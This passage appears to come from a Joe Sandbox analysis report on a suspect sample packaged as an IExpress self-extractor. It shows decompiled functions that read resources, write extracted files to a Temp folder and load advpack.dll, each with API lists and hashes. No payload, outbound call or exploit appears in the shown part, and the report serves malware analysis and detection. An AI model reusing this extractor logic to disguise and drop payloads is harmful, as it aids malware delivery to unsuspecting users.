                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 003964F9
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00396502
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                    • API String ID: 438848745-3761280616
                                                                                                                                                                                                    • Opcode ID: 2be10cac96241d5ce4d832cf8faaa22c84c422008bc04b8fc2e1f420f9904587
                                                                                                                                                                                                    • Instruction ID: e2431ad4ddcf085368ed41f0c770c43e4a1f55dec724cf13c3f4862eabeef407
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2be10cac96241d5ce4d832cf8faaa22c84c422008bc04b8fc2e1f420f9904587
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C801F930501108ABDF12DB64DC46FEE737CEB56311F510296F589961D0DF709E85CA51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                    			E00394169(void* __eflags) {
                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = E0039468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                    				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                    					if(E0039468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							return LocalFree(_t21);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(0x40);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t21);
                                                                                                                                                                                                    						_t18 = 0x3e9;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						E003944B9(0, _t18);
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_t18 = 0x4b1;
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E003944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    			}





                                                                                                                                                                                                    0x0039417d
                                                                                                                                                                                                    0x0039418f
                                                                                                                                                                                                    0x00394193
                                                                                                                                                                                                    0x003941b7
                                                                                                                                                                                                    0x003941d3
                                                                                                                                                                                                    0x003941e6
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003941e7
                                                                                                                                                                                                    0x003941d5
                                                                                                                                                                                                    0x003941d6
                                                                                                                                                                                                    0x003941d8
                                                                                                                                                                                                    0x003941d9
                                                                                                                                                                                                    0x003941da
                                                                                                                                                                                                    0x003941df
                                                                                                                                                                                                    0x003941e1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003941e1
                                                                                                                                                                                                    0x003941b9
                                                                                                                                                                                                    0x003941ba
                                                                                                                                                                                                    0x003941bc
                                                                                                                                                                                                    0x003941bd
                                                                                                                                                                                                    0x003941be
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003941be
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946A0
                                                                                                                                                                                                      • Part of subcall function 0039468F: SizeofResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946A9
                                                                                                                                                                                                      • Part of subcall function 0039468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003946C3
                                                                                                                                                                                                      • Part of subcall function 0039468F: LoadResource.KERNEL32(00000000,00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946CC
                                                                                                                                                                                                      • Part of subcall function 0039468F: LockResource.KERNEL32(00000000,?,00392D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003946D3
                                                                                                                                                                                                      • Part of subcall function 0039468F: memcpy_s.MSVCRT ref: 003946E5
                                                                                                                                                                                                      • Part of subcall function 0039468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003946EF
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003930B4), ref: 00394189
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003930B4), ref: 003941E7
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                    • Opcode ID: d4760706e9fc5277fb567cc681d6b15c025500e53dac47d0344ec88dd1b97ac7
                                                                                                                                                                                                    • Instruction ID: 6fd0e1f4f6fcaa00d6c1bce08d31fb6ec80c65e874f94be1c7a5cb5c7357db8d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4760706e9fc5277fb567cc681d6b15c025500e53dac47d0344ec88dd1b97ac7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E001FFFA3002253BFF27266A4C86F7B218EDBD5795F014126B706E62809AA9CC0241B5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00397155() {
                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                    				struct _FILETIME _v16;
                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                    				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                    				signed int _t36;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed int _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                    				_t23 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                    					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                    					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                    					_t39 = _t36;
                                                                                                                                                                                                    					if(_t36 == 0xbb40e64e || ( *0x398004 & 0xffff0000) == 0) {
                                                                                                                                                                                                    						_t36 = 0xbb40e64f;
                                                                                                                                                                                                    						_t39 = 0xbb40e64f;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x398004 = _t39;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t37 =  !_t36;
                                                                                                                                                                                                    				 *0x398008 = _t37;
                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x0039715d
                                                                                                                                                                                                    0x00397161
                                                                                                                                                                                                    0x00397165
                                                                                                                                                                                                    0x00397178
                                                                                                                                                                                                    0x00397182
                                                                                                                                                                                                    0x0039718e
                                                                                                                                                                                                    0x00397197
                                                                                                                                                                                                    0x003971a0
                                                                                                                                                                                                    0x003971b1
                                                                                                                                                                                                    0x003971b8
                                                                                                                                                                                                    0x003971c4
                                                                                                                                                                                                    0x003971c7
                                                                                                                                                                                                    0x003971cb
                                                                                                                                                                                                    0x003971d5
                                                                                                                                                                                                    0x003971da
                                                                                                                                                                                                    0x003971da
                                                                                                                                                                                                    0x003971dc
                                                                                                                                                                                                    0x003971dc
                                                                                                                                                                                                    0x003971e2
                                                                                                                                                                                                    0x003971e5
                                                                                                                                                                                                    0x003971ee

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00397182
                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00397191
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0039719A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003971A3
                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 003971B8
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1445889803-0
                                                                                                                                                                                                    • Opcode ID: 1658b4f99bb06d1c51d0f27eeca300d974fa5b6f9efb58522d5bc6f63bfdd9da
                                                                                                                                                                                                    • Instruction ID: 982e9384b4a1ad0e5044fd1e100fa0bf3154215e3c53b0cae469dd4e0b771683
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1658b4f99bb06d1c51d0f27eeca300d974fa5b6f9efb58522d5bc6f63bfdd9da
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3114C71D11608EFCF11DFB8DA48A9EB7F8EF48315F614956D801E7250EB319A04CB41
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E003919E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                    				_t27 = __ebx;
                                                                                                                                                                                                    				_t11 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                    				_t34 = _a4;
                                                                                                                                                                                                    				_t14 = _a8 - 0x110;
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					_t32 = GetDesktopWindow();
                                                                                                                                                                                                    					E003943D0(_t34, _t15);
                                                                                                                                                                                                    					_v520 = 0;
                                                                                                                                                                                                    					LoadStringA( *0x399a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                    					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                    					MessageBeep(0xffffffff);
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					if(_t14 != 1) {
                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t32 = _a12;
                                                                                                                                                                                                    						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							EndDialog(_t34, _t32);
                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                    			}













                                                                                                                                                                                                    0x003919e0
                                                                                                                                                                                                    0x003919e0
                                                                                                                                                                                                    0x003919eb
                                                                                                                                                                                                    0x003919f2
                                                                                                                                                                                                    0x003919f9
                                                                                                                                                                                                    0x003919fc
                                                                                                                                                                                                    0x00391a01
                                                                                                                                                                                                    0x00391a2a
                                                                                                                                                                                                    0x00391a2e
                                                                                                                                                                                                    0x00391a3e
                                                                                                                                                                                                    0x00391a4f
                                                                                                                                                                                                    0x00391a62
                                                                                                                                                                                                    0x00391a6a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391a03
                                                                                                                                                                                                    0x00391a06
                                                                                                                                                                                                    0x00391a20
                                                                                                                                                                                                    0x00391a20
                                                                                                                                                                                                    0x00391a08
                                                                                                                                                                                                    0x00391a08
                                                                                                                                                                                                    0x00391a14
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391a16
                                                                                                                                                                                                    0x00391a18
                                                                                                                                                                                                    0x00391a70
                                                                                                                                                                                                    0x00391a72
                                                                                                                                                                                                    0x00391a72
                                                                                                                                                                                                    0x00391a14
                                                                                                                                                                                                    0x00391a06
                                                                                                                                                                                                    0x00391a81

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00391A18
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00391A24
                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00391A4F
                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00391A62
                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00391A6A
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                    • Opcode ID: a14578774409f4e88c28c443d04cc116572b72ac399ad452c174260d947839c1
                                                                                                                                                                                                    • Instruction ID: e4212a9a3bc501bc1c8b5b15157e83d9ab01466afdbe4c073e612a5a9baa3bc5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a14578774409f4e88c28c443d04cc116572b72ac399ad452c174260d947839c1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A11C43260110AAFDF12EF68ED09AAE77BCEF49300F108256F912E7190DA319E11CBD5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                    			E003963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				long _v272;
                                                                                                                                                                                                    				void* _v276;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t15;
                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                    				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t15 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                    				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_v276 = _a16;
                                                                                                                                                                                                    				_t37 = 1;
                                                                                                                                                                                                    				E00391781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                    				E0039658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                    				_t28 = 0;
                                                                                                                                                                                                    				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                    				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                    					_t28 = _a4;
                                                                                                                                                                                                    					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                    						 *0x399124 = 0x80070052;
                                                                                                                                                                                                    						_t37 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					CloseHandle(_t39);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					 *0x399124 = 0x80070052;
                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00396CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x003963cb
                                                                                                                                                                                                    0x003963d2
                                                                                                                                                                                                    0x003963d8
                                                                                                                                                                                                    0x003963ea
                                                                                                                                                                                                    0x003963f3
                                                                                                                                                                                                    0x00396401
                                                                                                                                                                                                    0x00396402
                                                                                                                                                                                                    0x00396410
                                                                                                                                                                                                    0x00396415
                                                                                                                                                                                                    0x00396433
                                                                                                                                                                                                    0x00396438
                                                                                                                                                                                                    0x00396449
                                                                                                                                                                                                    0x00396463
                                                                                                                                                                                                    0x0039646d
                                                                                                                                                                                                    0x00396477
                                                                                                                                                                                                    0x00396477
                                                                                                                                                                                                    0x0039647a
                                                                                                                                                                                                    0x0039643a
                                                                                                                                                                                                    0x0039643a
                                                                                                                                                                                                    0x00396444
                                                                                                                                                                                                    0x00396444
                                                                                                                                                                                                    0x00396492

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039642D
                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039645B
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 0039647A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003963EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    • API String ID: 1065093856-1116576409
                                                                                                                                                                                                    • Opcode ID: 33da512aae4cf4872f3d59c7b3a1246af4c00f7907a3bad320f15b3835687ecb
                                                                                                                                                                                                    • Instruction ID: f147731c054ca56e473350979d0c965d1eab8d9f68154286064b13f5e30031c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33da512aae4cf4872f3d59c7b3a1246af4c00f7907a3bad320f15b3835687ecb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9421D871A0111CAFDB12DF65DC86FEB737CEB49314F00416AF545A7240DAB15D848FA4
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E003947E0(intOrPtr* __ecx) {
                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                    				void* _t19;
                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                    				void _t24;
                                                                                                                                                                                                    				struct HWND__* _t25;
                                                                                                                                                                                                    				struct HWND__* _t26;
                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t33 = __ecx;
                                                                                                                                                                                                    				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                    					_t22 = _t33;
                                                                                                                                                                                                    					_t27 = _t22 + 1;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t6 =  *_t22;
                                                                                                                                                                                                    						_t22 = _t22 + 1;
                                                                                                                                                                                                    					} while (_t6 != 0);
                                                                                                                                                                                                    					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                    					 *_t34 = _t24;
                                                                                                                                                                                                    					if(_t24 != 0) {
                                                                                                                                                                                                    						_t28 = _t33;
                                                                                                                                                                                                    						_t19 = _t28 + 1;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t9 =  *_t28;
                                                                                                                                                                                                    							_t28 = _t28 + 1;
                                                                                                                                                                                                    						} while (_t9 != 0);
                                                                                                                                                                                                    						E00391680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                    						_t11 =  *0x3991e0; // 0x2a78eb0
                                                                                                                                                                                                    						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                    						 *0x3991e0 = _t34;
                                                                                                                                                                                                    						return 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t25 =  *0x398584; // 0x0
                                                                                                                                                                                                    					E003944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                    					LocalFree(_t34);
                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 =  *0x398584; // 0x0
                                                                                                                                                                                                    				E003944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                    				goto L2;
                                                                                                                                                                                                    			}















                                                                                                                                                                                                    0x003947e8
                                                                                                                                                                                                    0x003947f0
                                                                                                                                                                                                    0x003947f4
                                                                                                                                                                                                    0x0039480f
                                                                                                                                                                                                    0x00394811
                                                                                                                                                                                                    0x00394814
                                                                                                                                                                                                    0x00394814
                                                                                                                                                                                                    0x00394816
                                                                                                                                                                                                    0x00394817
                                                                                                                                                                                                    0x00394829
                                                                                                                                                                                                    0x0039482b
                                                                                                                                                                                                    0x0039482f
                                                                                                                                                                                                    0x0039484f
                                                                                                                                                                                                    0x00394852
                                                                                                                                                                                                    0x00394855
                                                                                                                                                                                                    0x00394855
                                                                                                                                                                                                    0x00394857
                                                                                                                                                                                                    0x00394858
                                                                                                                                                                                                    0x00394860
                                                                                                                                                                                                    0x00394865
                                                                                                                                                                                                    0x0039486a
                                                                                                                                                                                                    0x0039486f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00394876
                                                                                                                                                                                                    0x00394831
                                                                                                                                                                                                    0x00394841
                                                                                                                                                                                                    0x00394847
                                                                                                                                                                                                    0x0039480b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039480b
                                                                                                                                                                                                    0x003947f6
                                                                                                                                                                                                    0x00394806
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00394E6F), ref: 003947EA
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00394823
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00394847
                                                                                                                                                                                                      • Part of subcall function 003944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00394518
                                                                                                                                                                                                      • Part of subcall function 003944B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00394554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00394851
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                    • API String ID: 359063898-1116576409
                                                                                                                                                                                                    • Opcode ID: 5850a8155ff4b6c5bfc617ac4e4f4a2220814d80ceb9f6ef5819d86b9ea32943
